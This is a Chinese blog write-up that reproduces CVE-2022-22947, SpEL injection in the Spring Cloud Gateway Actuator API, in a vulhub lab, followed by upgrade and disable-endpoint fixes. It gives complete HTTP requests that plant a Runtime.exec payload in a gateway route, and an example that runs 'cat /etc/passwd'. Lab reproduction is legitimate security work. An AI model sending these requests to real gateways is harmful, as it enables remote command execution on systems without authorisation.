Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)

最新推荐文章于 2023-05-11 22:26:09 发布
最新推荐文章于 2023-05-11 22:26:09 发布
阅读量519 收藏 2
点赞数
分类专栏: 漏洞复现 文章标签: web安全 spring 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43381463/article/details/130236356
版权
文章介绍了SpringCloudGateway在3.1.0及3.0.6之前的版本中存在SpEL表达式注入漏洞(CVE-2022-22947),攻击者可利用ActuatorAPI执行任意命令。提供了环境搭建、POC脚本以及手工复现步骤,同时给出了升级到安全版本和禁用GatewayActuator端点的修复建议。
摘要由CSDN通过智能技术生成

Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)

0x00 前言

Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。

影响版本:

Spring Cloud Gateway(3.1.x)< 3.1.1
Spring Cloud Gateway (3.0.x)< 3.0.7
Spring Cloud Gateway 其他已不再更新的版本

0x01 环境搭建

这里使用vulhub漏洞靶场

cd /opt/vulhub/spring/CVE-2022-22947
docker-compose up -d

访问http://your-ip:8080即可看到演示页面,这个页面的上游就是example.com

image-20230413121012004

0x02 POC/EXP脚本

cve_2022_22947_poc.py: https://github.com/lcyunkong/pochub/blob/main/pochub/poc_list/web/Spring/cve_2022_22947_poc.py

# 利用:
# 在代码最后传入目标url即可,实例:
vuln_scan_start("http://192.168.12.130:8080")

cve_2022_22947_cmd.py: https://github.com/lcyunkong/pochub/blob/main/pochub/poc_list/web/Spring/cve_2022_22947_cmd.py

# 利用:
# 在代码最后传入目标url和想要操作的命令即可,实例:
vuln_exploit_start("http://192.168.12.10:8080", "cat /etc/passwd")

0x03 手工复现

1、发送如下数据包即可添加一个包含恶意SpEL表达式的路由,执行id命令

POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329

{
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[] {\"id\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

image-20230413211735522

2、发送如下数据包应用刚添加的路由。这个数据包将触发SpEL表达式的执行:

POST /actuator/gateway/refresh HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

3、发送如下数据包即可查看执行结果:

GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-l5sT10Rh-1681867843904)(null)]

4、发送如下数据包清理现场,删除所添加的路由:

DELETE /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close

5、再刷新下路由:

POST /actuator/gateway/refresh HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

此时在返回查看第三步的页面已经消失了

image-20230413211644408

0x04 修复建议

1、升级到3.1.1+或3.0.7+版本,可以有效地避免该漏洞。

2、在不影响业务的前提下,通过将配置选项management.endpoint.gateway.enabled设置为false禁用Gateway Actuator端点。

贫僧法号云空丶
关注
专栏目录
Spring Cloud Gateway Actuator API SpEL 代码注入(CVE-2022-22947)漏洞复现
千寻的博客
03-30 2643
文章目录漏洞名称漏洞编号漏洞描述影响版本漏洞发现实验环境复现步骤第一步 发送以下请求第二步 刷新网关。第三步 发送以下请求以检索结果第四步 发送一个 DELETE 请求第五步 再次刷新网关第六步 补充第七步 关闭漏洞环境修复建议免责声明 漏洞名称 Spring Cloud Gateway Actuator API SpEL 代码注入 漏洞编号 CVE-2022-22947 漏洞描述 Spring Cloud Gateway 提供了一个库,用于在 Spring WebFlux 之上构建 API 网关
CVE-2022-22947 Spring Cloud Gateway SpEL 表达式注入 RCE漏洞复现
afei001
03-05 4845
当启用和暴露 Gateway Actuator 端点时,使用Spring Cloud Gateway的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而远程执行任意代码。
SpringCloudGateway远程代码执行CVE-2022-22947
m0_57379855的博客
03-12 1518
@TOC 基本介绍 微服务架构与Spring Cloud 【1】微服务架构 是一项在云中部署应用和服务的新技术。大部分围绕微服务的争论都集中在容器或其他技术是否能很好的实施微服务,而红帽说API应该是重点。 微服务可以在“自己的程序”中运行,并通过“轻量级设备与HTTP型API进行沟通”。 关键在于该服务可以在自己的程序中运行。 通过这一点我们就可以将服务公开与微服务架构(在现有系统中分布一个API)区分开来。 在服务公开中,许多服务都可以被内部独立进程所限制。 如果其中任何一个服务需要增加某种功能,那么就
[CVE-2022-22947]Spring Cloud Gateway Actuator API SpEL表达式注入命令执行
whoami
03-03 4776
一、背景 Spring Cloud GatewaySpring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。 二、漏洞分析 ShortcutConfigurable.java : static Object getValue(SpelExpressionParser parser, BeanFactory beanFactory, String entryValu..
【vulhub】Spring Cloud Gateway Actuator API SpEL表达式注入命令执行CVE-2022-22947
qq_45300786的博客
04-17 861
执行命令的话,就用原来的payload 原poc POST /actuator/gateway/routes/hacktest HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome
漏洞复现----42、Spring Cloud Gateway Actuator API SpEL表达式注入命令执行CVE-2022-22947)
七天
06-30 1240
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行CVE-2022-22947)
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞复现
最新发布
12-26
本文将详细探讨一个重要的安全问题——Spring Cloud Gateway Actuator APISpEL(Spring Expression Language)表达式注入漏洞(CVE-2022-22947),该漏洞可能导致命令执行,对系统安全构成严重威胁。首先,我们...
Spring Cloud Gateway Actuator API SpEL 代码注入漏洞复现 (CVE-2022-22947)
yang1234567898的博客
04-25 3360
概念: 什么是spring cloudSpring Cloud是一系列框架的有序集合。它利用Spring Boot的开发便利性巧妙地简化了分布式系统基础设施的开发,如服务发现注册、配置中心、消息总线、负载均衡、断路器、数据监控等,都可以用Spring Boot的开发风格做到一键启动和部署。Spring Cloud并没有重复制造轮子,它只是将各家公司开发的比较成熟、经得起实际考验的服务框架组合起来,通过Spring Boot风格进行再封装屏蔽掉了复杂的配置和实现原理,最终给开发者留出了一套简单易懂、易
Spring Cloud Gateway Actuator API SpEL代码注入
小白的博客
04-18 2460
CVE-2022-22947 Spring Cloud Gateway Actuator API SpEL代码注入 影响版本 Spring Cloud GateWay 3.0.0以下,3.1.0,3.0.0~3.0.6 漏洞描述 ​ Gateway是在Spring生态系统之上构建的API网关服务,基于Spring 5、Spring Boot 2和Project Reactor等技术。Gateway旨在提供-种简单而有效的方式来对API进行路由, 以及提供一些强大的过滤器功能, 例如: 熔断、限流、
CVE-2022-22947 SpringCloud Gateway 远程命令执行漏洞
dust_hk的博客
03-07 6550
CVE-2022-22947 SPRINGCLOUD GATEWAY SPEL RCE 摘要 Spring Cloud Gateway的商业产品是分布式API网关,用于路由HTTP请求并处理跨领域问题,如单点登录(SSO),速率限制,访问控制。借助Spring Cloud Gateway forKubernetes,运营商可以专注于管理和监控其目标环境中的API网关,而应用程序开发人员可以专注于API的公开方式,并应用适当的设计和跨领域问题。 在 3.1.1+ 和 3.0.7+ 之前的 spring clo
Spring Cloud Gateway 远程代码执行漏洞
qq_52072846的博客
03-18 518
漏洞描述 Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。 漏洞环境 git clone https://github.com/vulhub/vulhub/blob/master/spring/CVE-2022-22947/docker-compose.yml dock
CVE-2022-22947( Spring Cloud Gateway )SPEL RCE复现
问题很多的小明
03-03 1434
CVE-2022-22947( Spring Cloud Gateway )SPEL RCE复现
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行漏洞复现
Tauil的博客
07-25 900
查看其路由规则,因为这是个靶场,所以肯定是允许你访问的,正经网站肯定是不会给你访问的,打开burpsuite进行放包,我们需要添加一个新的路由到网关,添加新的路由需要用。表达式,所以我们可以选择任一过滤器进行使用,这里使用过滤器。然后使用refresh刷新路由配置,refresh也需要用。,并且可以看到他已经成功执行了我们输入的命令whoami。查看到路由表配置,此时可以看到多出了我们新添加的路由路径。方式提交,而网关最终会将所有的请求交给过滤链表。进行处理,所以我们将待执行命令放到。...
Spring Cloud GateWay SPEL RCE(CVE-2022-22947
weixin_43263451的博客
08-15 1579
这个漏洞本质是一个SPEL注入漏洞,需要应用暴漏actuator接口用来动态添加路由当Gateway Actuator端点是启用状态并且是允许访问的以及相关配置不安全时,使用Spring Cloud Gateway的应用程序容易受到代码注入攻击。远程攻击者可以利用Actuator动态添加恶意路由,若路由中包括SPEL表达式则在路由刷新时会对其进行解析从而达到SPEL表达式注入本质是一个SPEL表达式注入漏洞,本来是只有在修改路由配置文件的情况下才能导致RCE,但是由于Gateway提供了Actuator。.
Spring Cloud Gateway系列【14】Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947
记录知识、锤炼自我
03-13 6232
文章目录漏洞说明影响范围漏洞复现1. 搭建项目2. 注入恶意代码解决方案 漏洞说明 近日,VMware 官方发布安全公告,其中包含Spring Cloud Gateway远程代码执行漏洞(CVE-2022-22947)。使用 Spring Cloud Gateway的应用如果对外暴露了 Gateway Actuator接口,则可能存在被CVE-2022-22947漏洞利用的风险,攻击者可通过利用此漏洞执行 SpEL 表达式,从而在目标服务器上执行任意恶意代码,获取系统权限。 影响范围 Spring Cl
Spring Cloud Gateway SPEL RCE复现
HongYu012的博客
03-05 1168
目录 0 环境搭建 影响范围: Spring Cloud Gateway 3.1.x < 3.1.1 Spring Cloud Gateway < 3.0.7 p牛的vulhub已经搭好docker了,vulhub/spring/CVE-2022-22947 at master · vulhub/vulhub · GitHub 也可以本地搭建 git clone https://github.com/spring-cloud/spring-cloud-gateway cd sp.
spring 命令执行 (CVE-2022-22947)
qq_40646572的博客
05-11 1118
并且存在headdump文件,使用java -jar JDumpSpider-1.1-SNAPSHOT-full.jar .\heapdump进行一波分析,没发现有用的信息。2、缓解措施:如果不需要Gateway actuator endpoint,可通过 management.endpoint.gateway.enabled: false 禁用它。在http://192.168.5.128:21849/actuator/gateway/routes/页面下,发现路由信息。添加spel语句,执行系统指令。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值